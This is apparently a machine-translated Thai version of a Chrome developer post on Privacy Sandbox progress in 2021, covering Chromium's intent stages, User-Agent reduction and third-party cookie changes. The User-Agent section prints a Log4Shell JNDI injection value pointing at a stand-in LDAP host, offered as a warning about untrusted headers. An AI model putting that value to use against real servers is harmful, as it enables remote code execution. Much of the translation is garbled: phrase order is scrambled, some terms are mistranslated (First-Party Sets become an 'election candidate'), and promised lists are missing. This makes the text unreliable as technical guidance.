ความคืบหน้าใน Privacy Sandbox (ธันวาคม 2021)

ยินดีต้อนรับสู่ Progress in the Privacy ฉบับสรุปปี 2021 แซนด์บ็อกซ์, การติดตามเป้าหมายใน หนทางสู่การเลิกใช้คุกกี้ของบุคคลที่สามใน Chrome และมุ่งไปสู่การ เว็บส่วนตัว โดยปกติแล้ว เราจะแชร์ภาพรวมของการอัปเดตใน Privacy Sandbox ในไทม์ไลน์ ตลอดจนข่าวสารจาก แต่เดือนธันวาคมเป็นเดือนที่เงียบเหงา เราจะย้อนกลับไปที่ กิจกรรมตลอดปี 2021 นี้ มามอบวิธีแก้ปัญหาที่อาจเป็นไปได้ ปีใหม่แล้ว

ขั้นตอนการพัฒนา Chromium

หากต้องการให้ฟีเจอร์ใหม่ของแพลตฟอร์มเว็บแสดงใน Chromium ฟีเจอร์จะต้องดำเนินการตาม การพัฒนาแบบเปิดของโปรเจ็กต์ กระบวนการ ในปี 2021 นี้ สิ่งที่ทีม Privacy Sandbox สร้างมีดังนี้

แต่ละเป้าหมายถือเป็นคำเชิญให้เข้าร่วมระบบนิเวศของเว็บในวงกว้างด้วยเช่นกัน

ความตั้งใจในการสร้างต้นแบบคือจุดตรวจจุดแรกที่เราจะเชิญชวนให้เกิดการแลกเปลี่ยนความเห็น และการทดลองระยะแรก ซึ่งหมายความว่าข้อเสนอจะพร้อมให้ใช้งานใน GitHub ซึ่งคุณสามารถถามคำถามด้วยการสร้างปัญหาหรือเข้าร่วมการสนทนา และ งานนำเสนอในระดับมาตรฐาน เช่น W3C และ IETF ตรงนี้ยังเป็นจุดเริ่มเขียนโค้ด ซึ่งหมายความว่าคุณสามารถคาดหวังว่า ฟังก์ชันต้นแบบที่จะเปิดให้นักพัฒนาซอฟต์แวร์ ได้ทดสอบเบื้องหลัง ฟีเจอร์ Flag ความคิดเห็นเบื้องต้นเป็นสิ่งสำคัญสำหรับการตรวจสอบความถูกต้องและทำข้อเสนอซ้ำ

ความตั้งใจในการทดสอบเป็นขั้นตอนที่ไม่บังคับ หากเราต้องการขอให้ระบุ ช่วงทดลองใช้จากต้นทาง นักพัฒนาซอฟต์แวร์สามารถลงชื่อสมัครใช้ต้นทาง ทดลองใช้ฟีเจอร์ แล้วทดสอบการใช้งานจริง เราเรียกสิ่งนี้ว่า "การทดสอบ" เพราะเรามีแง่มุมเฉพาะเกี่ยวกับคุณลักษณะที่เรา ต้องการตรวจสอบในสภาพแวดล้อม การใช้งานจริง นักพัฒนาซอฟต์แวร์ที่สามารถทดสอบและ แชร์ผลการทดสอบเหล่านั้น ซึ่งมอบความคิดเห็นที่มีประโยชน์เพื่อช่วยทำซ้ำและ พัฒนาฟีเจอร์

ความตั้งใจที่จะจัดส่งคือเป้าหมายสุดท้ายที่บ่งบอกว่าฟีเจอร์หนึ่งๆ ได้เปิดตัวแล้วในตอนนี้ เสร็จสมบูรณ์และพร้อมใช้งานสำหรับผู้ใช้ทั่วไป เมื่อได้รับอนุมัติแล้ว ฟีเจอร์นั้นจะ ไปเป็นรุ่นที่กำลังจะเปิดตัว จากนั้นค่อยเป็นค่อยไป ผ่าน Canary, เบต้า และเวอร์ชันเสถียร สิ่งที่สำคัญอย่างยิ่งคือคุณต้องทดสอบเว็บไซต์ด้วย Canary และ รุ่นเบต้าของ Chrome เพื่อตรวจจับและ รายงานข้อบกพร่องก่อนที่จะเปิดตัวฟีเจอร์เสถียร

ข้อเสนอ

ข้อเสนอ Privacy Sandbox แต่ละรายการมีที่เก็บ GitHub ควบคู่กัน ต จะมีคำอธิบายในการสรุปฟังก์ชันการทำงานโดยรวม ในการใช้งานตามเบราว์เซอร์ และการมีส่วนร่วมจาก ระบบนิเวศของเว็บในรูปแบบของปัญหาและคำขอพุล

ในที่เก็บ Privacy Sandbox ทั้ง 14 รายการ เรามีสิ่งต่อไปนี้

ภาษาที่ใช้ในวิดีโออธิบายและข้อกำหนดมักจะกำหนดเป้าหมายไปยังผู้ชม มาตรฐานและการพัฒนาเบราว์เซอร์อยู่แล้ว ซึ่งสามารถ หากคุณยังไม่คุ้นเคยกับการใช้งาน แต่วัตถุประสงค์ของวิดีโออธิบายคือ อธิบาย! หากมีประเด็นที่ไม่ชัดเจนหรือไม่ได้ครอบคลุม เราอยากให้คุณ แจ้งปัญหา เพื่อให้เราอัปเดตและชี้แจงคำอธิบายได้

ความละเอียด

การทำความสะอาดแบบสปริงของ User Agent

ขณะที่เรานับถอยหลังสู่ปีใหม่ เราก็นับเพิ่มขึ้นทั้ง 2 อย่างด้วย Chrome 100 และการลดขนาดลงเรื่อยๆ ของสตริง User Agent ข้อมูลนี้คือดี แรงจูงใจให้กลับไปใช้งานสตริง User Agent ในโค้ดอีกครั้งเพื่อตรวจสอบว่า ได้รับผลกระทบจากการเปลี่ยนแปลงอย่างใดอย่างหนึ่งต่อไปนี้

วิธีค้นหาพื้นที่เหล่านั้น

1. ค้นหา navigator.userAgent ในโค้ด JavaScript หรือเข้าถึง User-Agent ในโค้ดเซิร์ฟเวอร์ของคุณ
2. ตรวจสอบการแยกวิเคราะห์สตริงเพื่อหาสมมติฐานเกี่ยวกับเวอร์ชันตัวเลข 2 หลัก สำหรับ เช่น ควรแทนที่นิพจน์ทั่วไปที่ระบุ \d\d หรือ \d{2} ด้วย \d+
3. ตรวจสอบการใช้สตริงนี้ในทุกที่ที่คุณต้องการใช้สตริงนี้
   • เวอร์ชันของแพลตฟอร์ม (ระบบปฏิบัติการ)
   • เวอร์ชันบิลด์เต็มของ Chrome
   • ชื่ออุปกรณ์เคลื่อนที่
4. ค่าเหล่านี้คือค่าที่จะลดจำนวนเป็นสตริงคงที่ในอนาคต ถ้า คุณต้องมีสิทธิ์เข้าถึงค่าเหล่านี้ ให้ย้ายข้อมูลไปยังไคลเอ็นต์ User-Agent คำแนะนำ

มีการอัปเดต 1 ธันวาคมที่จะกล่าวถึงหากคุณกำลังรับไคลเอ็นต์ User Agent เคล็ดลับ เราได้ส่ง Intent ที่จะจัดส่งเพื่อ เปิดใช้งานการมอบสิทธิ์คำแนะนำให้แก่ ต้นทางใน HTML ผ่านแท็ก <meta> เช่น

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

หากคุณกำลังชอบทำความสะอาด ในช่วงฤดูใบไม้ผลิ ให้ลองพิจารณา ทางเลือกอื่นๆ นอกเหนือจากการใช้ user-agent ทั้งหมด หากคุณกำลังใช้สตริงเพื่อ ตรวจหาอุปกรณ์เคลื่อนที่ แล้วตรวจสอบว่าคุณสามารถแทนที่ค่านี้ด้วยการตอบสนองตามอุปกรณ์ได้ไหม การออกแบบอีกด้วย หากคุณตรวจสอบชื่อและเวอร์ชันของเบราว์เซอร์เพื่อดูการสนับสนุนฟีเจอร์ โปรดดู คุณจะใช้การตรวจหาฟีเจอร์แทนได้ไหม

แต่อย่าลืมว่า User Agent เช่นเดียวกับที่ไคลเอ็นต์อื่นๆ ระบุ ของเรา ไม่รับประกันว่าจะมีความแม่นยำหรือแม้กระทั่งมีการระบุ Log4j ล่าสุด ช่องโหว่ "Log4shell" จะให้ตัวอย่างของความเสี่ยงนี้ ไคลเอ็นต์ที่ตั้งค่าสตริง User Agent เป็น ใส่ค่า เช่น ${jndi:ldap://example.com/file} อาจทำให้เว็บไซต์ แยกวิเคราะห์ส่วนนั้นบนเซิร์ฟเวอร์

การจัดแคตตาล็อกคุกกี้

กิจกรรมปีใหม่ตามประเพณีอีกอย่างคือการทำให้แน่ใจว่าคุณมีความสุขที่มี คุกกี้จำนวนมากและดีต่อสุขภาพด้วยส่วนผสมที่มีคุณภาพ ในขณะที่เราก้าวไปข้างหน้า ที่จะเลิกใช้คุกกี้ของบุคคลที่สาม คุณควรตรวจสอบว่า คุกกี้ใดของเว็บไซต์ที่จะได้รับผลกระทบ ปี 2020 เริ่มต้นอย่างรวดเร็วเพราะ จำเป็นต้องทำเครื่องหมายคุกกี้ทั้งหมดสำหรับการข้ามเว็บไซต์หรือของบุคคลที่สาม ใช้ ด้วย SameSite=None

คุกกี้ใดๆ ที่คุณได้ตั้งแอตทริบิวต์ SameSite เป็น None จะต้องใช้ อัปเดต

มี 3 เส้นทางที่เป็นไปได้ที่ควรพิจารณาในขณะนี้:

1. หากจำเป็นต้องใช้คุกกี้เฉพาะในความสัมพันธ์แบบ 1:1 กับเว็บไซต์ระดับบนสุด ให้ทำตามความคืบหน้าของชิป ซึ่งหมายถึงการเพิ่ม Partitioned ให้กับคุกกี้
2. หากใช้คุกกี้ในบริบทแบบข้ามเว็บไซต์ แต่เฉพาะในเว็บไซต์ที่คุณ เป็นเจ้าของและดำเนินการเอง จากนั้นก็อาจเป็นผู้สมัครรับเลือกตั้งสำหรับบุคคลที่หนึ่ง เซ็ต ซึ่งจำเป็นต้องระบุฟิลด์ เว็บไซต์ในชุดและเพิ่มแอตทริบิวต์ SameParty ลงในคุกกี้
3. หากมีการใช้คุกกี้เพื่อระบุรูปแบบบางอย่างของค่าที่ใช้ร่วมกันในหลาย ตรวจสอบการทำงานของ Privacy Sandbox ที่หลากหลายมากขึ้น ข้อเสนอสำหรับโซลูชันอื่นที่ไม่ ต้องอาศัยการติดตามข้ามเว็บไซต์

หากคุณรู้สึกใส่ใจสุขภาพเป็นพิเศษ ช่วงเวลานี้ก็เหมาะสมที่สุด เพื่อกลับไปใช้งานคุกกี้ทั้งหมดของคุณอีกครั้ง เรามีสูตรดีๆ ในการปรับปรุง คุกกี้ของบุคคลที่หนึ่งอีกด้วย

ความคิดเห็น

ในขณะที่เราเผยแพร่การอัปเดตรายเดือนเหล่านี้อย่างต่อเนื่อง และกำลังดำเนินอยู่ Privacy Sandbox โดยรวม เราต้องการให้นักพัฒนาแอปได้รับ ข้อมูลและการสนับสนุนที่ต้องการ แจ้งให้เราทราบได้ที่ @ChromiumDev Twitter ถ้ามีอะไรที่เราพอจะตอบได้ ที่ดีขึ้นในซีรีส์นี้ เราจะใช้ความคิดเห็นของคุณเพื่อปรับปรุงรูปแบบนี้ต่อไป

โปรดดูคำถามที่พบบ่อยเกี่ยวกับ Privacy Sandbox ซึ่งเรา ขยายต่อไปตามปัญหาที่คุณส่งไปยังการสนับสนุนนักพัฒนาซอฟต์แวร์ ที่เก็บ หากคุณ มีข้อสงสัยเกี่ยวกับการทดสอบหรือการปรับใช้ข้อเสนอใดๆ มาคุยกับเราได้ที่นั่น